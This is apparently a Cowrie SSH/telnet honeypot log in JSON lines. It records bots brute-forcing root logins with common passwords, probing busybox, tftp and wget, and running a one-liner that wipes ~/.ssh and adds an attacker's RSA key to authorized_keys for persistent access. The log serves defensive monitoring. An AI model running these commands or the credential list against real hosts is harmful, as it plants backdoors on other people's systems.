{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:01:27.272742Z","src_ip":"51.81.118.153","session":"dac336826ccc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:01:27.367851Z","src_ip":"51.81.118.153","session":"dac336826ccc"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:01:27.794002Z","src_ip":"51.81.118.153","session":"dac336826ccc"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:01:28.891413Z","src_ip":"51.81.118.153","session":"dac336826ccc"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":39590,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9d3d5870bda","protocol":"ssh","message":"New connection: 51.81.118.153:39590 (1.2.3.4:22) [session: f9d3d5870bda]","sensor":"my-vps","timestamp":"2025-09-09T04:01:28.984771Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:01:28.985616Z","src_ip":"51.81.118.153","session":"f9d3d5870bda"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:01:29.080413Z","src_ip":"51.81.118.153","session":"f9d3d5870bda"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:01:29.497053Z","src_ip":"51.81.118.153","session":"f9d3d5870bda"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:01:29.593301Z","src_ip":"51.81.118.153","session":"f9d3d5870bda"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:01:29.598406Z","src_ip":"51.81.118.153","session":"9ff99dd99973"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58240,"dst_ip":"1.2.3.4","dst_port":23,"session":"dc33a5a753f9","protocol":"telnet","message":"New connection: 212.227.235.229:58240 (1.2.3.4:23) [session: dc33a5a753f9]","sensor":"my-vps","timestamp":"2025-09-09T04:01:34.173231Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59308,"dst_ip":"1.2.3.4","dst_port":23,"session":"64c61ed452e0","protocol":"telnet","message":"New connection: 212.227.235.229:59308 (1.2.3.4:23) [session: 64c61ed452e0]","sensor":"my-vps","timestamp":"2025-09-09T04:01:34.540561Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"54321","message":"login attempt [admin/54321] failed","sensor":"my-vps","timestamp":"2025-09-09T04:01:34.682414Z","src_ip":"212.227.235.229","session":"dc33a5a753f9"}
{"eventid":"cowrie.login.success","username":"root","password":"klv123","message":"login attempt [root/klv123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:01:35.190551Z","src_ip":"212.227.235.229","session":"dc33a5a753f9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:01:35.216054Z","src_ip":"212.227.235.229","session":"dc33a5a753f9"}
{"eventid":"cowrie.command.input","input":"enable","message":"CMD: enable","sensor":"my-vps","timestamp":"2025-09-09T04:01:35.373020Z","src_ip":"212.227.235.229","session":"dc33a5a753f9"}
{"eventid":"cowrie.command.input","input":"system","message":"CMD: system","sensor":"my-vps","timestamp":"2025-09-09T04:01:35.374900Z","src_ip":"212.227.235.229","session":"dc33a5a753f9"}
{"eventid":"cowrie.command.failed","input":"system","message":"Command not found: system","sensor":"my-vps","timestamp":"2025-09-09T04:01:35.376081Z","src_ip":"212.227.235.229","session":"dc33a5a753f9"}
{"eventid":"cowrie.command.input","input":"shell","message":"CMD: shell","sensor":"my-vps","timestamp":"2025-09-09T04:01:35.377682Z","src_ip":"212.227.235.229","session":"dc33a5a753f9"}
{"eventid":"cowrie.command.failed","input":"shell","message":"Command not found: shell","sensor":"my-vps","timestamp":"2025-09-09T04:01:35.378643Z","src_ip":"212.227.235.229","session":"dc33a5a753f9"}
{"eventid":"cowrie.command.input","input":"sh","message":"CMD: sh","sensor":"my-vps","timestamp":"2025-09-09T04:01:35.379452Z","src_ip":"212.227.235.229","session":"dc33a5a753f9"}
{"eventid":"cowrie.command.input","input":"cat /proc/mounts; /bin/busybox KIAZT","message":"CMD: cat /proc/mounts; /bin/busybox KIAZT","sensor":"my-vps","timestamp":"2025-09-09T04:01:35.537579Z","src_ip":"212.227.235.229","session":"dc33a5a753f9"}
{"eventid":"cowrie.command.input","input":"cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox KIAZT","message":"CMD: cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox KIAZT","sensor":"my-vps","timestamp":"2025-09-09T04:01:35.700376Z","src_ip":"212.227.235.229","session":"dc33a5a753f9"}
{"eventid":"cowrie.command.input","input":"tftp; wget; /bin/busybox KIAZT","message":"CMD: tftp; wget; /bin/busybox KIAZT","sensor":"my-vps","timestamp":"2025-09-09T04:01:35.862313Z","src_ip":"212.227.235.229","session":"dc33a5a753f9"}
{"eventid":"cowrie.command.input","input":"dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","message":"CMD: dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","sensor":"my-vps","timestamp":"2025-09-09T04:01:36.023231Z","src_ip":"212.227.235.229","session":"dc33a5a753f9"}
{"eventid":"cowrie.command.failed","input":"while read i","message":"Command not found: while read i","sensor":"my-vps","timestamp":"2025-09-09T04:01:36.025441Z","src_ip":"212.227.235.229","session":"dc33a5a753f9"}
{"eventid":"cowrie.command.input","input":"/bin/busybox KIAZT","message":"CMD: /bin/busybox KIAZT","sensor":"my-vps","timestamp":"2025-09-09T04:01:36.183120Z","src_ip":"212.227.235.229","session":"dc33a5a753f9"}
{"eventid":"cowrie.command.input","input":"rm .s; exit","message":"CMD: rm .s; exit","sensor":"my-vps","timestamp":"2025-09-09T04:01:36.185236Z","src_ip":"212.227.235.229","session":"dc33a5a753f9"}
{"eventid":"cowrie.command.input","input":"q","message":"CMD: q","sensor":"my-vps","timestamp":"2025-09-09T04:01:36.186781Z","src_ip":"212.227.235.229","session":"dc33a5a753f9"}
{"eventid":"cowrie.command.failed","input":"q","message":"Command not found: q","sensor":"my-vps","timestamp":"2025-09-09T04:01:36.187526Z","src_ip":"212.227.235.229","session":"dc33a5a753f9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7954f5c30c176a02bb19116bcbab42f9feea51864c5f74148f75f2ded3684463","size":3550,"shasum":"7954f5c30c176a02bb19116bcbab42f9feea51864c5f74148f75f2ded3684463","duplicate":false,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/7954f5c30c176a02bb19116bcbab42f9feea51864c5f74148f75f2ded3684463 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:01:36.189195Z","src_ip":"212.227.235.229","session":"dc33a5a753f9"}
{"eventid":"cowrie.session.closed","duration":2.0214433670043945,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:01:36.194597Z","src_ip":"212.227.235.229","session":"dc33a5a753f9"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":45116,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf1088c72d4f","protocol":"ssh","message":"New connection: 211.22.25.164:45116 (1.2.3.4:22) [session: cf1088c72d4f]","sensor":"my-vps","timestamp":"2025-09-09T04:01:39.243319Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:01:39.244197Z","src_ip":"211.22.25.164","session":"cf1088c72d4f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:01:39.484038Z","src_ip":"211.22.25.164","session":"cf1088c72d4f"}
{"eventid":"cowrie.login.success","username":"root","password":"nE7jAInvalid","message":"login attempt [root/nE7jAInvalid] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:01:40.486130Z","src_ip":"211.22.25.164","session":"cf1088c72d4f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:01:41.019122Z","src_ip":"211.22.25.164","session":"cf1088c72d4f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:01:41.020039Z","src_ip":"211.22.25.164","session":"cf1088c72d4f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:01:41.021279Z","src_ip":"211.22.25.164","session":"cf1088c72d4f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:01:41.262842Z","src_ip":"211.22.25.164","session":"cf1088c72d4f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:01:41.797768Z","src_ip":"211.22.25.164","session":"cf1088c72d4f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:01:41.798542Z","src_ip":"211.22.25.164","session":"cf1088c72d4f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:01:42.040797Z","src_ip":"211.22.25.164","session":"cf1088c72d4f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:01:42.041672Z","src_ip":"211.22.25.164","session":"cf1088c72d4f"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":45118,"dst_ip":"1.2.3.4","dst_port":22,"session":"df5e54101b7e","protocol":"ssh","message":"New connection: 211.22.25.164:45118 (1.2.3.4:22) [session: df5e54101b7e]","sensor":"my-vps","timestamp":"2025-09-09T04:01:42.280020Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:01:42.281074Z","src_ip":"211.22.25.164","session":"df5e54101b7e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:01:42.520999Z","src_ip":"211.22.25.164","session":"df5e54101b7e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:01:43.523283Z","src_ip":"211.22.25.164","session":"df5e54101b7e"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:01:44.765911Z","src_ip":"211.22.25.164","session":"df5e54101b7e"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":45120,"dst_ip":"1.2.3.4","dst_port":22,"session":"08284ede57cd","protocol":"ssh","message":"New connection: 211.22.25.164:45120 (1.2.3.4:22) [session: 08284ede57cd]","sensor":"my-vps","timestamp":"2025-09-09T04:01:45.005312Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:01:45.006312Z","src_ip":"211.22.25.164","session":"08284ede57cd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:01:45.246205Z","src_ip":"211.22.25.164","session":"08284ede57cd"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:01:46.245259Z","src_ip":"211.22.25.164","session":"08284ede57cd"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:01:46.486210Z","src_ip":"211.22.25.164","session":"cf1088c72d4f"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:01:46.488002Z","src_ip":"211.22.25.164","session":"08284ede57cd"}
{"eventid":"cowrie.session.closed","duration":13.000560998916626,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:01:47.541053Z","src_ip":"212.227.235.229","session":"64c61ed452e0"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":40270,"dst_ip":"1.2.3.4","dst_port":22,"session":"572d917572c2","protocol":"ssh","message":"New connection: 192.210.135.20:40270 (1.2.3.4:22) [session: 572d917572c2]","sensor":"my-vps","timestamp":"2025-09-09T04:01:58.773672Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:01:58.774318Z","src_ip":"192.210.135.20","session":"572d917572c2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:01:58.883884Z","src_ip":"192.210.135.20","session":"572d917572c2"}
{"eventid":"cowrie.login.success","username":"root","password":"Asd123","message":"login attempt [root/Asd123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:01:59.363918Z","src_ip":"192.210.135.20","session":"572d917572c2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:01:59.603237Z","src_ip":"192.210.135.20","session":"572d917572c2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:01:59.603949Z","src_ip":"192.210.135.20","session":"572d917572c2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:01:59.605140Z","src_ip":"192.210.135.20","session":"572d917572c2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:01:59.715641Z","src_ip":"192.210.135.20","session":"572d917572c2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:02:00.057199Z","src_ip":"192.210.135.20","session":"572d917572c2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa 